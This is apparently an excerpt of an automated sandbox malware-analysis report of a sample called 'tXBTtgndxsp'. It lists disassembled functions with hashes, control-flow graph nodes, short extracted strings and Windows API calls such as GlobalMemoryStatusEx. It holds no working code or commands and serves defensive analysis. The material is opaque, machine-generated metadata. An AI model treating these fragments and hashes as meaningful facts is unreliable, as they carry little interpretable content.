                                                        • API String ID: 0-13811129
                                                        • Opcode ID: efa54041eff9c95b36c285896a9c05d7698424791ea010d47eadaa394667a58f
                                                        • Instruction ID: c3053cda1bcc418ce8a21ebe8b8f76b4a2d29c03ed1e961653bfc3582fdb4d9f
                                                        • Opcode Fuzzy Hash: efa54041eff9c95b36c285896a9c05d7698424791ea010d47eadaa394667a58f
                                                        • Instruction Fuzzy Hash: DEB13E71E002098FDB54CFA9C8857DDBBF2BF88314F148529E455E72A8EB789885CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01013E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
                                                        • API String ID: 0-13811129
                                                        • Opcode ID: 97d2b864c810429ea8be0525926f736b0ed177ea5ed06293d3e70ac7ae856b97
                                                        • Instruction ID: 4f075dd7f505127c436b31b8d27259a30cc36e08508eb94acee6749af50b534f
                                                        • Opcode Fuzzy Hash: 97d2b864c810429ea8be0525926f736b0ed177ea5ed06293d3e70ac7ae856b97
                                                        • Instruction Fuzzy Hash: 7E915C70E002099FDB64CFA9C8857DEBBF2BF88314F148529E455EB258DB789845CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01019A58 Relevance: .6, Instructions: 615COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f11e29fb89e0e0c0ec6e07372e1524f5740b55f35fa4631407c130bef385866
                                                        • Instruction ID: c7cc21f20ea47f47d91e5884339024b865d8a5102a27de40612448b6d3f942be
                                                        • Opcode Fuzzy Hash: 2f11e29fb89e0e0c0ec6e07372e1524f5740b55f35fa4631407c130bef385866
                                                        • Instruction Fuzzy Hash: 2D328B34B002048FDB55DB68D894BADBBF2FB88314F1485A9E906DB399DB79DC41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01014A98 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9ce4151d59a20628a786387a1863361b4e9b53924529037525cd1213a509597
                                                        • Instruction ID: 4985479e0c01d2c83e1c7b0333547924505a1a38c76f53f7cf5c8b37caa8a1f5
                                                        • Opcode Fuzzy Hash: c9ce4151d59a20628a786387a1863361b4e9b53924529037525cd1213a509597
                                                        • Instruction Fuzzy Hash: 78B14F71E002098FDF64DFA9D8817DDBBF2BF88314F148529D455EB2A8EB789845CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01014804 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1449 1014804-101489c 1452 10148e6-10148e8 1449->1452 1453 101489e-10148a9 1449->1453 1454 10148ea-1014902 1452->1454 1453->1452 1455 10148ab-10148b7 1453->1455 1462 1014904-101490f 1454->1462 1463 101494c-101494e 1454->1463 1456 10148b9-10148c3 1455->1456 1457 10148da-10148e4 1455->1457 1458 10148c5 1456->1458 1459 10148c7-10148d6 1456->1459 1457->1454 1458->1459 1459->1459 1461 10148d8 1459->1461 1461->1457 1462->1463 1464 1014911-101491d 1462->1464 1465 1014950-1014962 1463->1465 1466 1014940-101494a 1464->1466 1467 101491f-1014929 1464->1467 1472 1014969-1014995 1465->1472 1466->1465 1469 101492b 1467->1469 1470 101492d-101493c 1467->1470 1469->1470 1470->1470 1471 101493e 1470->1471 1471->1466 1473 101499b-10149a9 1472->1473 1474 10149b2-1014a0f 1473->1474 1475 10149ab-10149b1 1473->1475 1482 1014a11-1014a15 1474->1482 1483 1014a1f-1014a23 1474->1483 1475->1474 1482->1483 1484 1014a17-1014a1a call 1010ab8 1482->1484 1485 1014a33-1014a37 1483->1485 1486 1014a25-1014a29 1483->1486 1484->1483 1489 1014a47-1014a4b 1485->1489 1490 1014a39-1014a3d 1485->1490 1486->1485 1488 1014a2b-1014a2e call 1010ab8 1486->1488 1488->1485 1493 1014a5b 1489->1493 1494 1014a4d-1014a51 1489->1494 1490->1489 1492 1014a3f 1490->1492 1492->1489 1496 1014a5c 1493->1496 1494->1493 1495 1014a53 1494->1495 1495->1493 1496->1496
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k$\V/k
                                                        • API String ID: 0-2939617536
                                                        • Opcode ID: 40a5793a387404b85eec333ef95f8866c4f2d2f9abd9fed7c692c6a0b447dd9d
                                                        • Instruction ID: 553092bbb849273ae858dc04a41442ec0a6de2a3734a4e1ef8a1a6d5ad053496
                                                        • Opcode Fuzzy Hash: 40a5793a387404b85eec333ef95f8866c4f2d2f9abd9fed7c692c6a0b447dd9d
                                                        • Instruction Fuzzy Hash: 4B716BB1E00249DFDB54CFA9C8847DDBBF2BF48314F148129E455EB268DB789842CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01014810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1497 1014810-101489c 1500 10148e6-10148e8 1497->1500 1501 101489e-10148a9 1497->1501 1502 10148ea-1014902 1500->1502 1501->1500 1503 10148ab-10148b7 1501->1503 1510 1014904-101490f 1502->1510 1511 101494c-101494e 1502->1511 1504 10148b9-10148c3 1503->1504 1505 10148da-10148e4 1503->1505 1506 10148c5 1504->1506 1507 10148c7-10148d6 1504->1507 1505->1502 1506->1507 1507->1507 1509 10148d8 1507->1509 1509->1505 1510->1511 1512 1014911-101491d 1510->1512 1513 1014950-1014995 1511->1513 1514 1014940-101494a 1512->1514 1515 101491f-1014929 1512->1515 1521 101499b-10149a9 1513->1521 1514->1513 1517 101492b 1515->1517 1518 101492d-101493c 1515->1518 1517->1518 1518->1518 1519 101493e 1518->1519 1519->1514 1522 10149b2-1014a0f 1521->1522 1523 10149ab-10149b1 1521->1523 1530 1014a11-1014a15 1522->1530 1531 1014a1f-1014a23 1522->1531 1523->1522 1530->1531 1532 1014a17-1014a1a call 1010ab8 1530->1532 1533 1014a33-1014a37 1531->1533 1534 1014a25-1014a29 1531->1534 1532->1531 1537 1014a47-1014a4b 1533->1537 1538 1014a39-1014a3d 1533->1538 1534->1533 1536 1014a2b-1014a2e call 1010ab8 1534->1536 1536->1533 1541 1014a5b 1537->1541 1542 1014a4d-1014a51 1537->1542 1538->1537 1540 1014a3f 1538->1540 1540->1537 1544 1014a5c 1541->1544 1542->1541 1543 1014a53 1542->1543 1543->1541 1544->1544
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k$\V/k
                                                        • API String ID: 0-2939617536
                                                        • Opcode ID: 7cbb1c7288379f13a60b95bb85f49c4040e04fe1780721a0a48f74c99d69611a
                                                        • Instruction ID: b6261e95662f79f31f4d26916028beebbd27b5376ae371ed1a0fc1e606611619
                                                        • Opcode Fuzzy Hash: 7cbb1c7288379f13a60b95bb85f49c4040e04fe1780721a0a48f74c99d69611a
                                                        • Instruction Fuzzy Hash: 47715A71E00249DFDB14CFA9C8807DEBBF2BF88314F148129E455EB268DB789842CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0671D2EF Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2184 671d2ef-671d2f0 2185 671d2f2-671d35e 2184->2185 2186 671d2bc-671d2c1 2184->2186 2187 671d360-671d366 2185->2187 2188 671d369-671d370 2185->2188 2189 671d2c3-671d2c5 2186->2189 2190 671d2c7-671d2c9 2186->2190 2187->2188 2193 671d372-671d378 2188->2193 2194 671d37b-671d3b3 2188->2194 2189->2190 2191 671d2cb-671d2cd 2190->2191 2192 671d2cf-671d2d1 2190->2192 2191->2192 2195 671d2d3-671d2d5 2192->2195 2196 671d2d7-671d2d9 call 671b35c 2192->2196 2193->2194 2197 671d3bb-671d41a CreateWindowExW 2194->2197 2195->2196 2202 671d2bb 2196->2202 2203 671d2dd-671d2de 2196->2203 2199 671d423-671d45b 2197->2199 2200 671d41c-671d422 2197->2200 2208 671d468 2199->2208 2209 671d45d-671d460 2199->2209 2200->2199 2202->2186 2206 671d2e1-671d2eb 2202->2206 2206->2184 2210 671d469 2208->2210 2209->2208 2210->2210
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0671D40A
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3713096608.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_6710000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: b641586e03e122a121b2402ac0b7bbf123eec35aafcc01e7c66371508650e77c
                                                        • Instruction ID: 144bb584ee0e5169a36193911f21bafc70d177bd2914d59def105764c97b40ec
                                                        • Opcode Fuzzy Hash: b641586e03e122a121b2402ac0b7bbf123eec35aafcc01e7c66371508650e77c
                                                        • Instruction Fuzzy Hash: 9351DEB1D00309EFDF25CFA9D984ADDBBB1BF49310F24812AE818AB260D775A945CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06719B60 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2211 6719b60-6719b6b 2212 6719b95-6719bb4 call 6718d1c 2211->2212 2213 6719b6d-6719b7b 2211->2213 2220 6719bb6-6719bb9 2212->2220 2221 6719bba-6719bfa 2212->2221 2214 6719b7f-6719b94 call 6718d10 2213->2214 2227 6719c02-6719c04 2221->2227 2228 6719bfc 2221->2228 2230 6719c06-6719c19 2227->2230 2231 6719c7d-6719cac GlobalMemoryStatusEx 2227->2231 2228->2214 2229 6719bff 2228->2229 2229->2227 2238 6719c1b-6719c1e 2230->2238 2239 6719c1f-6719c76 2230->2239 2232 6719cb5-6719cdd 2231->2232 2233 6719cae-6719cb4 2231->2233 2233->2232 2239->2231
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3713096608.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_6710000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2f85076819a5144f4111272549f02682b9aa309ddef3032b4839665e9f87dda
                                                        • Instruction ID: 92368aee81fe9433146297356a256ea345359674658c6263288c31190c9a5e57
                                                        • Opcode Fuzzy Hash: d2f85076819a5144f4111272549f02682b9aa309ddef3032b4839665e9f87dda
                                                        • Instruction Fuzzy Hash: 18414672D043858FDB14DFB9D8143AEBBF1AF8A210F18856FD585AB281DB349845CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0671D2F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2241 671d2f8-671d35e 2242 671d360-671d366 2241->2242 2243 671d369-671d370 2241->2243 2242->2243 2244 671d372-671d378 2243->2244 2245 671d37b-671d3b3 2243->2245 2244->2245 2246 671d3bb-671d41a CreateWindowExW 2245->2246 2247 671d423-671d45b 2246->2247 2248 671d41c-671d422 2246->2248 2252 671d468 2247->2252 2253 671d45d-671d460 2247->2253 2248->2247 2254 671d469 2252->2254 2253->2252 2254->2254
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0671D40A
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3713096608.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_6710000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 992aae7e3008a2f23f132e71c001617b7cfad6a344a409b4b6c5347df45dadff
                                                        • Instruction ID: ca8d3550525c7261c46e3cb5daef3750a094ec4e40f60ee37f7a728c0ce417f1
                                                        • Opcode Fuzzy Hash: 992aae7e3008a2f23f132e71c001617b7cfad6a344a409b4b6c5347df45dadff
                                                        • Instruction Fuzzy Hash: EC41C1B1D00308DFDB24CF99D884ADEBBB5BF48310F24812AE819AB210D775A945CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06718D1C Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2255 6718d1c-6719cac GlobalMemoryStatusEx 2258 6719cb5-6719cdd 2255->2258 2259 6719cae-6719cb4 2255->2259 2259->2258
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06719BB2), ref: 06719C9F
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3713096608.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_6710000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 8d7aee45d9a1b6599b23d4eb24f56fc9817fbf7c7b573031d0f4c1948e42ffb7
                                                        • Instruction ID: cae818ce40ef0b2dd3211bf50c9985e4ee05c420daf4c9d5180e4d3e01b9a981
                                                        • Opcode Fuzzy Hash: 8d7aee45d9a1b6599b23d4eb24f56fc9817fbf7c7b573031d0f4c1948e42ffb7
                                                        • Instruction Fuzzy Hash: EF1106B1C006599FDB10DFAAC544BDEFBF4AB48210F10812AE918A7240D378A945CFE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06719C31 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06719BB2), ref: 06719C9F
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3713096608.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_6710000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 0c3aeab347185a5c233a3458527c56af35c08bc9bc4e396d5911f32ad2a8712c
                                                        • Instruction ID: 479cedab86d685d50b14e773d719ed01ed81d123ab6e8c8f8529442ee1ce9267
                                                        • Opcode Fuzzy Hash: 0c3aeab347185a5c233a3458527c56af35c08bc9bc4e396d5911f32ad2a8712c
                                                        • Instruction Fuzzy Hash: 201147B2C002598FDB10CFAAC544BEEFBF0BF48310F10816AE818A7241D379A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0671B250 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0671C2B6
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3713096608.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_6710000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: da831c638c6fdefc075310c75f88980630966280b18ac90af7262faac9ff2c1c
                                                        • Instruction ID: 89218c9d7d0d3f3b5e87ab38611669666840cb272a1ad7aaf8291db156238b34
                                                        • Opcode Fuzzy Hash: da831c638c6fdefc075310c75f88980630966280b18ac90af7262faac9ff2c1c
                                                        • Instruction Fuzzy Hash: F01120B6C002098FDB20CF9AC844BDEFBF4AB89220F10842AD519BB200C379A504CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0671C24B Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0671C2B6
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3713096608.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_6710000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 80d96984393c8d8cc94993258bb9ae5aa98082fc46d0f60b8d8de2f6a1cf01d7
                                                        • Instruction ID: 26115cf15eac834b754faebd1e472d40fe10f1cd3a0434314b5ed0bdb0f3b14e
                                                        • Opcode Fuzzy Hash: 80d96984393c8d8cc94993258bb9ae5aa98082fc46d0f60b8d8de2f6a1cf01d7
                                                        • Instruction Fuzzy Hash: 64113FB6C002098FCB10CF9AC944BDEFBF4AF48224F14851AD429BB240C379A504CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010141BF Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
                                                        • API String ID: 0-13811129
                                                        • Opcode ID: 9bdd4afa65a6b248c12f7e5d7f737c84afb246c8f4ddfe413f4f1290b5cea2e1
                                                        • Instruction ID: 85a4b12bdaa602984cf88a804c07febcdd0508a41122005c2193000d81674f3e
                                                        • Opcode Fuzzy Hash: 9bdd4afa65a6b248c12f7e5d7f737c84afb246c8f4ddfe413f4f1290b5cea2e1
                                                        • Instruction Fuzzy Hash: 85B13D70E00209DFDB64CFA9D8857DDBBF1BF48314F148129E855EB2A8DB789885CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01013E74 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
                                                        • API String ID: 0-13811129
                                                        • Opcode ID: 96230acddc3a689aee061c794e2895988160251ce24a638fe226843766c11962
                                                        • Instruction ID: 532fbaefd22d58611e555d73c8e823f9bcfa7a11462ca18c574ad3f958a88f30
                                                        • Opcode Fuzzy Hash: 96230acddc3a689aee061c794e2895988160251ce24a638fe226843766c11962
                                                        • Instruction Fuzzy Hash: 50916C70E00209DFDB65CFA9C8857DDBBF2BF48314F148129E495EB268DB789885CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01016EDB Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: 565001aeb03556f83037034ae4e69ce76e73c747c1c4f0ce3b67e4fcf4886a1f
                                                        • Instruction ID: f0d026a3fd1d8df102358db9a182461ec15714f52e3f72083f1cadcfbb8af4f0
                                                        • Opcode Fuzzy Hash: 565001aeb03556f83037034ae4e69ce76e73c747c1c4f0ce3b67e4fcf4886a1f
                                                        • Instruction Fuzzy Hash: 6B518E34700215CFDB15DB69C858BAE7BF6BF89300F2040A9E546EB3A5DB799C41CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01017D2C Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: 1d9a630348925d20fffec88c5edc74a642da36148fe76da651d44fa2926f03d5
                                                        • Instruction ID: 14e3cec4ce742d89df51418b5e177018949aa8b371d849cc8e5aa6df0a5b5abe
                                                        • Opcode Fuzzy Hash: 1d9a630348925d20fffec88c5edc74a642da36148fe76da651d44fa2926f03d5
                                                        • Instruction Fuzzy Hash: 94318E30E10209CBDB56DFA8C85579EBBF2EF8A300F608559E842EB295EB749D418B50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01017D90 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: a0f277a6a5e32d3ae6a4c1a29027c7e5b8255ad691b18e2e6088f0b98533d600
                                                        • Instruction ID: b57b10549dd141273b4843178450dac1dae56fabe1b203a1024a6658e509f958
                                                        • Opcode Fuzzy Hash: a0f277a6a5e32d3ae6a4c1a29027c7e5b8255ad691b18e2e6088f0b98533d600
                                                        • Instruction Fuzzy Hash: F3316F31E10209CBDB55DBA9C8457AEB7F2FF89300F608569F906EB245EB74AD41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01016B99 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: 5648120f205157530f0a7458881b1b8a658cf9408bd5fe956d0cefa7fc67aa1c
                                                        • Instruction ID: 28d24dece3918f3bcaaf014be2e929c0a72784c266814097259fc89fce32d2bf
                                                        • Opcode Fuzzy Hash: 5648120f205157530f0a7458881b1b8a658cf9408bd5fe956d0cefa7fc67aa1c
                                                        • Instruction Fuzzy Hash: 6E21C0317002509FC719EB3998157AE7BE2EF86700F1485EEE005CB79ADE668D468791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01010838 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Co
                                                        • API String ID: 0-3798529171
                                                        • Opcode ID: ef3c7dcc225e25df62c8310b5229a421d2d9421ce037aaf94527dcba6fd05f6a
                                                        • Instruction ID: e9448f8d8a17a109884fd6ec303f0113e848460c600be5d143fa7c91c6878b0f
                                                        • Opcode Fuzzy Hash: ef3c7dcc225e25df62c8310b5229a421d2d9421ce037aaf94527dcba6fd05f6a
                                                        • Instruction Fuzzy Hash: 5A11EB34B082055BEF666A78C45437937E1EB85210F1449A9F4C2CF28EDA6DC8C64BD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01010848 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Co
                                                        • API String ID: 0-3798529171
                                                        • Opcode ID: cb5242db497bf5312fa9dcc61cbdab5520cffafbf41720c0c58096b86cae4f5f
                                                        • Instruction ID: bee74c3c41618aa5e99bcf0e370c0e886674f66420403a469c9c4a8b7a133d75
                                                        • Opcode Fuzzy Hash: cb5242db497bf5312fa9dcc61cbdab5520cffafbf41720c0c58096b86cae4f5f
                                                        • Instruction Fuzzy Hash: 3A11C834B042094BEFA5AA7DC44436932E5EB85614F1049B9F4C2CF25EDA29CCC64BD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01018868 Relevance: .9, Instructions: 934COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0cae94c346bc4f0570dab3dc98b269975aa7eef64455aa82eb0d3e41d0a2936f
                                                        • Instruction ID: ac3a571e4990fd239383eade1c1b0133a7bcb3aac58508084792888f4d937861
                                                        • Opcode Fuzzy Hash: 0cae94c346bc4f0570dab3dc98b269975aa7eef64455aa82eb0d3e41d0a2936f
                                                        • Instruction Fuzzy Hash: 3B823A7CB003148FC759FB28E991B6E77B6EB89324B208869E905D7398DF35AD41CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01018878 Relevance: .9, Instructions: 934COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7670a18512a11fa8bc0dea8ad7546657d3f1750e7c96f8e597f41f6063feda9e
                                                        • Instruction ID: fef129675c735ee146c4c5224f9b49bc0428c7242012fd82210b1ad28b84cb2a
                                                        • Opcode Fuzzy Hash: 7670a18512a11fa8bc0dea8ad7546657d3f1750e7c96f8e597f41f6063feda9e
                                                        • Instruction Fuzzy Hash: 8B823A7CB003148FC759FB28E991B6E77B6EB89324B208869E905D7398DF35AD41CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0101D6E8 Relevance: .3, Instructions: 338COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
